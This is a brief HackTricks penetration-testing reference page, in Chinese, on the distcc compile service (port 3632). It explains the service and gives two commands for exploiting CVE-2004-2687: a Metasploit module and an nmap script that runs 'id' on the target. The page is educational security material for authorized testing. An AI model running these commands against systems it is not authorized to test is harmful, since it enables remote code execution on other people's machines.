hacktricks/network-services-pentesting/3632-pentesting-distcc.md
2023-08-03 19:12:22 +00:00

3.9 KiB
Raw Blame History

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

基本信息

Distcc旨在通过利用其他计算机上未使用的处理能力来加快编译速度。安装了distcc的机器可以将代码通过网络发送到安装了distccd守护进程和兼容编译器的计算机上进行编译。

默认端口: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

漏洞利用

检查是否存在CVE-2004-2687漏洞以执行任意代码:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-exec --script-args="distcc-exec.cmd='id'"

Shodan

我不认为Shodan能检测到这个服务。

资源

由**Álex B (@r1p)**创建的帖子

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥